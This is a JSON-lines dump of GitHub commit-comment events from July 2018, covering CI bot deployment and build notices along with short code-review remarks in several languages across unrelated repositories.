{"id":"7979118934","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740573,"position":null,"line":null,"path":null,"commit_id":"9dac28ee1a35388068dc48002016beae45fa4379","created_at":"2018-07-17T20:36:26Z","updated_at":"2018-07-17T20:36:26Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circletestm](https://circletestm-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://circletestm-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-17T20:36:26Z"}
{"id":"7979120081","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29740578,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T20:36:40Z","updated_at":"2018-07-17T20:36:40Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.01%25-green.png)</a>\n"}},"created_at":"2018-07-17T20:36:40Z"}
{"id":"7979120166","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29740579,"position":73,"line":73,"path":"DBConnector.py","commit_id":"0446ba6795144496cfb0f081e7009883eba7c6a1","created_at":"2018-07-17T20:36:41Z","updated_at":"2018-07-17T20:36:41Z","author_association":"COLLABORATOR","body":"Вроде того, но в принципе это всего лишь одна проверка\r\n"}},"created_at":"2018-07-17T20:36:41Z"}
{"id":"7979123829","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29740584,"position":11,"line":11,"path":"JSTaskStLab.html","commit_id":"377ee93fc422ef174798066bc52ec4ef571d1e66","created_at":"2018-07-17T20:37:24Z","updated_at":"2018-07-17T20:37:24Z","author_association":"NONE","body":"don't use one html control for input value, result value and validation messages. should be three different conrols in this case:\r\n- text input for input value\r\n- label near the text input for validation message\r\n- result block for output value"}},"created_at":"2018-07-17T20:37:24Z"}
{"id":"7979129180","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29740589,"position":null,"line":null,"path":null,"commit_id":"04539175d19e6420f364a39f5a28aa76c50e62fb","created_at":"2018-07-17T20:38:31Z","updated_at":"2018-07-17T20:38:31Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4470)*\n"}},"created_at":"2018-07-17T20:38:31Z"}
{"id":"7979130944","type":"CommitCommentEvent","actor":{"login":"cristian-david"},"repo":{"name":"cristian-david/appConvenioUsbSena"},"payload":{"comment":{"id":29740590,"position":null,"line":null,"path":null,"commit_id":"c73aa11be130da01e0e249d6f8643925281102ad","created_at":"2018-07-17T20:38:52Z","updated_at":"2018-07-17T20:38:52Z","author_association":"OWNER","body":"Se relacionó la tabla de municipios con la tabla de datosaprendices para los siguientes campos: dirmunicipio y nacimunicipio.\r\nSe eliminaron los campos de dirpais, dirdepartamentos, nacipais, y nacidepartamentos de la tabla datosaprendices."}},"created_at":"2018-07-17T20:38:52Z"}
{"id":"7979133658","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29740599,"position":39,"line":39,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-17T20:39:25Z","updated_at":"2018-07-17T20:39:25Z","author_association":"NONE","body":"I've just tried it  in one of present scripts this way:\r\n`assert_script_run \"./vmcp_main.sh  | tee vmcp_main.log /dev/$serialdev\";`\r\n\r\nI edited the script vmcp_main.sh so it must fail and return non-zero exitcode\r\nBut in fact, the testcase in openQA reported as all green PASSED, because `tee` had overwritten exitcode with zero"}},"created_at":"2018-07-17T20:39:25Z"}
{"id":"7979142964","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29740617,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T20:41:19Z","updated_at":"2018-07-17T20:41:19Z","author_association":"CONTRIBUTOR","body":"I made [SimpleProcessWrapper](https://github.com/DigitalMediaServer/DigitalMediaServer/blob/master/src/main/java/net/pms/io/SimpleProcessWrapper.java) for situations like this. Running external processes in Java is very bug prone, so it's easier to use code that handles all the pitfalls. This command will for example cause DMS to hang if there's an output to the command (if the OS \"says\" something back, like an error). There are other pitfalls as well, I don't remember them all now :wink: \r\n\r\nFor a simple example of how to use it, see here: https://github.com/DigitalMediaServer/DigitalMediaServer/blob/9428ebed93629af035a1c0eb52bebd3adf95fe94/src/main/java/net/pms/dlna/RootFolder.java#L334\r\n\r\nYou don't need to keep the output if you don't want it, but it's needed to check for errors."}},"created_at":"2018-07-17T20:41:19Z"}
{"id":"7979151111","type":"CommitCommentEvent","actor":{"login":"shaal"},"repo":{"name":"shaal/newexp55"},"payload":{"comment":{"id":29740634,"position":null,"line":null,"path":null,"commit_id":"ac88979d9260e3e828e33697c83264e30fee9532","created_at":"2018-07-17T20:42:57Z","updated_at":"2018-07-17T20:42:57Z","author_association":"OWNER","body":"Created multidev environment [newexp55#ci-1](https://dashboard.pantheon.io/sites/33191e93-1dad-4a2e-86b0-8c442525aa7e#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-newexp55.pantheonsite.io/)"}},"created_at":"2018-07-17T20:42:57Z"}
{"id":"7979152174","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740635,"position":null,"line":null,"path":null,"commit_id":"9dac28ee1a35388068dc48002016beae45fa4379","created_at":"2018-07-17T20:43:10Z","updated_at":"2018-07-17T20:43:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circletestm](https://circletestm-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://circletestm-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-17T20:43:10Z"}
{"id":"7979169083","type":"CommitCommentEvent","actor":{"login":"melissamas"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740662,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:46:30Z","updated_at":"2018-07-17T20:46:30Z","author_association":"NONE","body":"# calculator\r\n\r\nprint (1+2)\r\n\r\n This is the content of my calc.py file. I have it saved as calc.py and after I saved it, it changed to show syntax coloring. Technically calc.py should be in python even though it was written with sublime text correct? \r\n\r\nI am getting very mixed responses in my command center:\r\n\r\nC:\\Users\\melis>python calc.py\r\n'python' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n\r\nC:\\Users\\melis>py\r\nPython 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018, 04:06:47) [MSC v.1914 32 bit (Intel)] on win32\r\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\r\n>>> py calc.pu\r\n  File \"<stdin>\", line 1\r\n    py calc.pu\r\n          ^\r\nSyntaxError: invalid syntax\r\n>>> py calc.py\r\n  File \"<stdin>\", line 1\r\n    py calc.py\r\n          ^\r\nSyntaxError: invalid syntax\r\n>>>"}},"created_at":"2018-07-17T20:46:30Z"}
{"id":"7979176700","type":"CommitCommentEvent","actor":{"login":"evantahler"},"repo":{"name":"actionhero/actionhero"},"payload":{"comment":{"id":29740676,"position":9,"line":32,"path":".circleci/config.yml","commit_id":"7551ce15e2ede3f1677060cdc4b3a3e16b21a094","created_at":"2018-07-17T20:47:59Z","updated_at":"2018-07-17T20:47:59Z","author_association":"MEMBER","body":"Hello @RectorRoot! What's on your mind?"}},"created_at":"2018-07-17T20:47:59Z"}
{"id":"7979181735","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29740687,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T20:48:57Z","updated_at":"2018-07-17T20:48:57Z","author_association":"MEMBER","body":"Not on windows. Please check appveyor runs.\n\nOn Tue, Jul 17, 2018, 3:29 PM James Michael Bell <notifications@github.com>\nwrote:\n\n> We can revert these changes for now. They seem to compile successfully on\n> Mac and Linux within a Python 2 environment.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cryoem/eman2/commit/a6519991c11b9fb2ae30229fcdc4fba9aededdb0#commitcomment-29740502>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHljmWS4tuEENigzMnjSS7A5ti0MUxIbks5uHkkugaJpZM4VR1Fw>\n> .\n>\n"}},"created_at":"2018-07-17T20:48:57Z"}
{"id":"7979185078","type":"CommitCommentEvent","actor":{"login":"manishkk"},"repo":{"name":"manishkk/Rust"},"payload":{"comment":{"id":29740694,"position":null,"line":null,"path":null,"commit_id":"80765e651a9c64ce70eef22c57bdb541d2e34a1c","created_at":"2018-07-17T20:49:40Z","updated_at":"2018-07-17T20:49:40Z","author_association":"OWNER","body":"Data Types"}},"created_at":"2018-07-17T20:49:40Z"}
{"id":"7979187184","type":"CommitCommentEvent","actor":{"login":"rapgro"},"repo":{"name":"palinek/nm-tray"},"payload":{"comment":{"id":29740696,"position":12,"line":349,"path":"src/tray.cpp","commit_id":"7120cf930014a53efbbc546ae38f69ab7492cac0","created_at":"2018-07-17T20:50:06Z","updated_at":"2018-07-17T20:50:06Z","author_association":"NONE","body":"How gets the configuration file read from disk? Additionally, /usr/share is the wrong place to find configuration (commit 7594357).\r\nhttps://github.com/palinek/nm-tray/commit/7594357334132ef13a10769030d50e5f62673c1c"}},"created_at":"2018-07-17T20:50:06Z"}
{"id":"7979187214","type":"CommitCommentEvent","actor":{"login":"johnkennedy9147"},"repo":{"name":"freeCodeCamp/study-group-directory"},"payload":{"comment":{"id":29740697,"position":null,"line":null,"path":null,"commit_id":"8b2ac4f8f38dce551c4ce33b2f48e4f92eca40d1","created_at":"2018-07-17T20:50:06Z","updated_at":"2018-07-17T20:50:06Z","author_association":"COLLABORATOR","body":"@techminto yes, its been added"}},"created_at":"2018-07-17T20:50:06Z"}
{"id":"7979190976","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740701,"position":29,"line":107,"path":"settings.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:50:49Z","updated_at":"2018-07-17T20:50:49Z","author_association":"MEMBER","body":"@Rohanator9000 Last parameter PARAM_BOOL"}},"created_at":"2018-07-17T20:50:49Z"}
{"id":"7979192166","type":"CommitCommentEvent","actor":{"login":"azizsabuj"},"repo":{"name":"azizsabuj/QuizApp"},"payload":{"comment":{"id":29740705,"position":null,"line":null,"path":null,"commit_id":"452c70428cf31ecf2b897c3bbd829ebe974afc11","created_at":"2018-07-17T20:51:03Z","updated_at":"2018-07-17T20:51:03Z","author_association":"OWNER","body":"Please add all image resource file to git then commit\r\n"}},"created_at":"2018-07-17T20:51:03Z"}
{"id":"7979192411","type":"CommitCommentEvent","actor":{"login":"rapgro"},"repo":{"name":"palinek/nm-tray"},"payload":{"comment":{"id":29740707,"position":null,"line":null,"path":null,"commit_id":"7594357334132ef13a10769030d50e5f62673c1c","created_at":"2018-07-17T20:51:06Z","updated_at":"2018-07-17T20:51:06Z","author_association":"NONE","body":"/usr/share is the wrong place to find configuration because not writable and normally, all configuration goes into /etc"}},"created_at":"2018-07-17T20:51:06Z"}
{"id":"7979202104","type":"CommitCommentEvent","actor":{"login":"alirezakasmaei"},"repo":{"name":"alirezakasmaei/hello-world"},"payload":{"comment":{"id":29740721,"position":1,"line":1,"path":"README.md","commit_id":"722480126f6bf6f1a6cfc33ca91ec5901e897e69","created_at":"2018-07-17T20:53:03Z","updated_at":"2018-07-17T20:53:03Z","author_association":"OWNER","body":"hi ali"}},"created_at":"2018-07-17T20:53:03Z"}
{"id":"7979204639","type":"CommitCommentEvent","actor":{"login":"mobilestrike-discorderver"},"repo":{"name":"mobilestrike-discorderver/MobileStrike.DiscordSever"},"payload":{"comment":{"id":29740728,"position":null,"line":null,"path":null,"commit_id":"31882793c10596fcc0d6db41c80aa5157635b563","created_at":"2018-07-17T20:53:34Z","updated_at":"2018-07-17T20:53:34Z","author_association":"OWNER","body":"Sup"}},"created_at":"2018-07-17T20:53:34Z"}
{"id":"7979208376","type":"CommitCommentEvent","actor":{"login":"ozank"},"repo":{"name":"ErencanDuymaz/Research"},"payload":{"comment":{"id":29740738,"position":null,"line":null,"path":null,"commit_id":"1b96f6048d7a959baa19df7c05a81bd86438069f","created_at":"2018-07-17T20:54:18Z","updated_at":"2018-07-17T20:54:18Z","author_association":"COLLABORATOR","body":"Eyvallah,\r\nBir ara gel de tezini teknik olarak tartışalım, tez chapterlaının üstünden geçelim"}},"created_at":"2018-07-17T20:54:18Z"}
{"id":"7979210275","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29740741,"position":18,"line":18,"path":"lesson1/right_triangle.rb","commit_id":"6a3b83de6897388ca6c59ac4ff64db7dc5dc673c","created_at":"2018-07-17T20:54:40Z","updated_at":"2018-07-17T20:54:40Z","author_association":"NONE","body":"Ничего не сказано про равносторонний, а так же про равнобедренный будет выведено только если прямоугольный. \r\n\r\nСовет: \r\nотсортируй сначала стороны, тогда не надо будет делать три проверки на теорему пифагора, достаточно будет одной. \r\nЕсли разберешься с массивами - отсортировать можно через массив\r\nsorted = [a, b, c].sort\r\n\r\nЕсли нет, то через if тоже можно, чуть сложнее. \r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T20:54:40Z"}
{"id":"7979213595","type":"CommitCommentEvent","actor":{"login":"Si8oT"},"repo":{"name":"Surf-N-Code/noia-node-terminal"},"payload":{"comment":{"id":29740745,"position":null,"line":null,"path":null,"commit_id":"450394a73568a3bb235d0ebb2c1f88bde260e9f8","created_at":"2018-07-17T20:55:18Z","updated_at":"2018-07-17T20:55:18Z","author_association":"NONE","body":" cp /home/noia/**noia**/noia-node-terminal/noia-node.service /etc/systemd/system/\r\n\r\nremove the double noia directory in the path"}},"created_at":"2018-07-17T20:55:18Z"}
{"id":"7979214059","type":"CommitCommentEvent","actor":{"login":"ozank"},"repo":{"name":"orhuntas/synchronousbuckconverter"},"payload":{"comment":{"id":29740748,"position":null,"line":null,"path":null,"commit_id":"7aea7d993b5f0d1669ae066bbc0b42701392b122","created_at":"2018-07-17T20:55:24Z","updated_at":"2018-07-17T20:55:24Z","author_association":"NONE","body":":+1: :clap: Eline sağlık\r\n4. sınıf rahat geçecek bu gidişle, ama 3'e bişey diyemem :stuck_out_tongue: "}},"created_at":"2018-07-17T20:55:24Z"}
{"id":"7979215098","type":"CommitCommentEvent","actor":{"login":"timotheecour"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29740750,"position":null,"line":null,"path":null,"commit_id":"ae09879b3a1a87b3949a9847ce517b2a507b7167","created_at":"2018-07-17T20:55:36Z","updated_at":"2018-07-17T20:55:36Z","author_association":"CONTRIBUTOR","body":"s/if true/block/ ?"}},"created_at":"2018-07-17T20:55:36Z"}
{"id":"7979215726","type":"CommitCommentEvent","actor":{"login":"expert975"},"repo":{"name":"ciber96/mtabg"},"payload":{"comment":{"id":29740751,"position":null,"line":null,"path":null,"commit_id":"0b0fc49bb3afe833f7319e96c55c7419706125e1","created_at":"2018-07-17T20:55:44Z","updated_at":"2018-07-17T20:55:44Z","author_association":"COLLABORATOR","body":"Reimplemented in 0730411906002e17747249f2702b85ca338a2a22"}},"created_at":"2018-07-17T20:55:44Z"}
{"id":"7979216632","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740753,"position":null,"line":null,"path":null,"commit_id":"3e0aa8202f544863d32adff8625bf009045fa771","created_at":"2018-07-17T20:55:55Z","updated_at":"2018-07-17T20:55:55Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/237291551b438570f16b5fe5a574465342e1a0fe/.circleci/config.yml)\n- [/docs/support](https://circleci2r-static-docs.pantheonsite.io/docs/support)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/3e0aa8202f544863d32adff8625bf009045fa771/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T20:55:55Z"}
{"id":"7979217907","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740755,"position":5,"line":20,"path":"mlmodelinterpreter/MLModelInterpreterExample/ViewController.swift","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:56:10Z","updated_at":"2018-07-17T20:56:10Z","author_association":"NONE","body":"Why do you need to annotate this class with @objc?  Is it for making it visible to potential objc callers?  If so, why does this class need to be called from objc?"}},"created_at":"2018-07-17T20:56:10Z"}
{"id":"7979220004","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740758,"position":null,"line":null,"path":null,"commit_id":"f559572bcad277ecb0a18367c590bfd757b3b435","created_at":"2018-07-17T20:56:34Z","updated_at":"2018-07-17T20:56:34Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circletestm](https://circletestm-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://circletestm-static-docs.pantheonsite.io/docs/support)\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/f559572bcad277ecb0a18367c590bfd757b3b435/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/f559572bcad277ecb0a18367c590bfd757b3b435/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T20:56:34Z"}
{"id":"7979225833","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740769,"position":20,"line":20,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/AppDelegate.h","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:57:45Z","updated_at":"2018-07-17T20:57:45Z","author_association":"NONE","body":"nit: `strong` is the default value, so I guess we don't need to specify it?"}},"created_at":"2018-07-17T20:57:45Z"}
{"id":"7979226052","type":"CommitCommentEvent","actor":{"login":"hwillson"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":29740770,"position":3,"line":3,"path":"packages/inter-process-messaging/inter-process-messaging.js","commit_id":"7d25b592b61f9ad9f9f6398ffcc65da300a239ee","created_at":"2018-07-17T20:57:48Z","updated_at":"2018-07-17T20:57:48Z","author_association":"MEMBER","body":"Wow @benjamn - looking at your [package name choice](https://www.npmjs.com/package/arson), should we start worrying? 🔥🔥🔥 "}},"created_at":"2018-07-17T20:57:48Z"}
{"id":"7979228687","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29740773,"position":17,"line":17,"path":"lesson1/quadratic_equation.rb","commit_id":"6a3b83de6897388ca6c59ac4ff64db7dc5dc673c","created_at":"2018-07-17T20:58:19Z","updated_at":"2018-07-17T20:58:19Z","author_association":"NONE","body":"Корень из d надо вычислять один раз, и потом его использовать. "}},"created_at":"2018-07-17T20:58:19Z"}
{"id":"7979233001","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"Teamblocket/PCFly"},"payload":{"comment":{"id":29740779,"position":null,"line":null,"path":null,"commit_id":"9dd83e8ac6ed0b3cee0555c70ce387dd3f54ce3f","created_at":"2018-07-17T20:59:08Z","updated_at":"2018-07-17T20:59:08Z","author_association":"NONE","body":"Please consider submitting this version as an update"}},"created_at":"2018-07-17T20:59:08Z"}
{"id":"7979233140","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740780,"position":null,"line":null,"path":null,"commit_id":"f94bba6b48bc55913f7c747542aeceaafe937b6d","created_at":"2018-07-17T20:59:09Z","updated_at":"2018-07-17T20:59:09Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 82](http://ci.n5o.green/viewLog.html?buildId=1594&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:28"}},"created_at":"2018-07-17T20:59:09Z"}
{"id":"7979233664","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29740781,"position":7,"line":7,"path":"lesson1/quadratic_equation.rb","commit_id":"6a3b83de6897388ca6c59ac4ff64db7dc5dc673c","created_at":"2018-07-17T20:59:15Z","updated_at":"2018-07-17T20:59:15Z","author_association":"NONE","body":"Коэффициенты могут быть дробными"}},"created_at":"2018-07-17T20:59:15Z"}
{"id":"7979235669","type":"CommitCommentEvent","actor":{"login":"AndreyPoznyak"},"repo":{"name":"AndreyPoznyak/VoiceAmazonService"},"payload":{"comment":{"id":29740784,"position":8,"line":158,"path":"src/database/database.js","commit_id":"88bd2d06202703adadc04473aff8de6672b7a7d5","created_at":"2018-07-17T20:59:40Z","updated_at":"2018-07-17T20:59:40Z","author_association":"OWNER","body":"if (service) {} would be better I think :)"}},"created_at":"2018-07-17T20:59:40Z"}
{"id":"7979236779","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29740786,"position":11,"line":11,"path":"lesson1/ideal_weight.rb","commit_id":"6a3b83de6897388ca6c59ac4ff64db7dc5dc673c","created_at":"2018-07-17T20:59:53Z","updated_at":"2018-07-17T20:59:53Z","author_association":"NONE","body":".to_i лучше делать при получении, тогда в переменной будет число, а не строка"}},"created_at":"2018-07-17T20:59:53Z"}
{"id":"7979237964","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29740790,"position":8,"line":8,"path":"lesson1/ideal_weight.rb","commit_id":"6a3b83de6897388ca6c59ac4ff64db7dc5dc673c","created_at":"2018-07-17T21:00:08Z","updated_at":"2018-07-17T21:00:08Z","author_association":"NONE","body":"странное название для переменной, просишь ввести рост, а записываешь в вес"}},"created_at":"2018-07-17T21:00:08Z"}
{"id":"7979241541","type":"CommitCommentEvent","actor":{"login":"tditchek"},"repo":{"name":"benmanbs/CouragersAndroid"},"payload":{"comment":{"id":29740799,"position":11,"line":11,"path":"app/src/main/java/com/benjaminshai/couragers/Constants.kt","commit_id":"97550b1ff2133f0346ee31bff9b1597405a70ad5","created_at":"2018-07-17T21:00:47Z","updated_at":"2018-07-17T21:00:47Z","author_association":"NONE","body":"if we move it to a private repo then we can probably keep this stuff in   ;)"}},"created_at":"2018-07-17T21:00:47Z"}
{"id":"7979243429","type":"CommitCommentEvent","actor":{"login":"hazalagca"},"repo":{"name":"hazalagca/comeBack"},"payload":{"comment":{"id":29740801,"position":null,"line":null,"path":null,"commit_id":"7751ea3415749da4cc7d123e3f46fbfbab07683d","created_at":"2018-07-17T21:01:11Z","updated_at":"2018-07-17T21:01:11Z","author_association":"OWNER","body":"READ.ME içeriği oluşturuluyorum.proje öncelikle buradan başlayacak. **gerekli açıklamalar buradan sağlanacak.**\r\n"}},"created_at":"2018-07-17T21:01:11Z"}
{"id":"7979244628","type":"CommitCommentEvent","actor":{"login":"hazalagca"},"repo":{"name":"hazalagca/comeBack"},"payload":{"comment":{"id":29740806,"position":null,"line":null,"path":null,"commit_id":"7751ea3415749da4cc7d123e3f46fbfbab07683d","created_at":"2018-07-17T21:01:23Z","updated_at":"2018-07-17T21:01:23Z","author_association":"OWNER","body":"açıklama2"}},"created_at":"2018-07-17T21:01:23Z"}
{"id":"7979245654","type":"CommitCommentEvent","actor":{"login":"agaida"},"repo":{"name":"palinek/nm-tray"},"payload":{"comment":{"id":29740807,"position":null,"line":null,"path":null,"commit_id":"7594357334132ef13a10769030d50e5f62673c1c","created_at":"2018-07-17T21:01:33Z","updated_at":"2018-07-17T21:01:33Z","author_association":"CONTRIBUTOR","body":"hmm - try to see the bigger picture and see the configuration as a kind of template. Imagine where you would put your configuration files as distributor (or a admin would place his configuration files). "}},"created_at":"2018-07-17T21:01:33Z"}
{"id":"7979247977","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740810,"position":null,"line":null,"path":null,"commit_id":"d85f6c43d8c8c272d1016c4dddc0ef09235466e1","created_at":"2018-07-17T21:01:59Z","updated_at":"2018-07-17T21:01:59Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 83](http://ci.n5o.green/viewLog.html?buildId=1595&buildTypeId=Plugins_Csv) is now running\n"}},"created_at":"2018-07-17T21:01:59Z"}
{"id":"7979249660","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"FaigerSYS/AntiToolbox"},"payload":{"comment":{"id":29740816,"position":null,"line":null,"path":null,"commit_id":"a85e3755a7d3254be533ab445fd15780b3686ab5","created_at":"2018-07-17T21:02:21Z","updated_at":"2018-07-17T21:02:21Z","author_association":"NONE","body":"Dear @FaigerSYS:\nI regret to inform you that the release you submitted, named \"**AntiToolbox**\" (v1.0), for the project [AntiToolbox](https://poggit.pmmp.io/ci/FaigerSYS/AntiToolbox/AntiToolbox) on 2018-07-16T07:36:08.000Z, has been rejected.\n\nThis plugin is too simple and relies on a single characteristic of Toolbox, which can easily be changed instead of relying on proper anti-cheat math.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-17T21:02:21Z"}
{"id":"7979250145","type":"CommitCommentEvent","actor":{"login":"naveegoteamcity"},"repo":{"name":"naveego/plugin-pub-csv"},"payload":{"comment":{"id":29740818,"position":null,"line":null,"path":null,"commit_id":"d85f6c43d8c8c272d1016c4dddc0ef09235466e1","created_at":"2018-07-17T21:02:26Z","updated_at":"2018-07-17T21:02:26Z","author_association":"NONE","body":"TeamCity Plugins / CSV [Build 83](http://ci.n5o.green/viewLog.html?buildId=1595&buildTypeId=Plugins_Csv) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:26"}},"created_at":"2018-07-17T21:02:26Z"}
{"id":"7979250795","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29740821,"position":null,"line":null,"path":null,"commit_id":"d077119321479f3af7690f9d646894676667bc7d","created_at":"2018-07-17T21:02:33Z","updated_at":"2018-07-17T21:02:33Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-224](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-224).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-224-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T21:02:33Z"}
{"id":"7979252069","type":"CommitCommentEvent","actor":{"login":"timotheecour"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29740824,"position":null,"line":null,"path":null,"commit_id":"f2b6efb7dcffd0a41543ee755329aa5748887b42","created_at":"2018-07-17T21:02:48Z","updated_at":"2018-07-17T21:02:48Z","author_association":"CONTRIBUTOR","body":"@Quelklef\r\nthis seems useful. However, a side effect is, when i run `nim doc lib/pure/ospaths.nim` locally, I get this weirdly formatted output (which I don't think was the case before):\r\n\r\n![image](https://user-images.githubusercontent.com/2194784/42845108-d28c2b06-89c9-11e8-9126-18179c6d4ff3.png)\r\n\r\nhow would i get the pragmas clickable locally? (thanks for pointing me to a doc if there's one that explains that)\r\n"}},"created_at":"2018-07-17T21:02:48Z"}
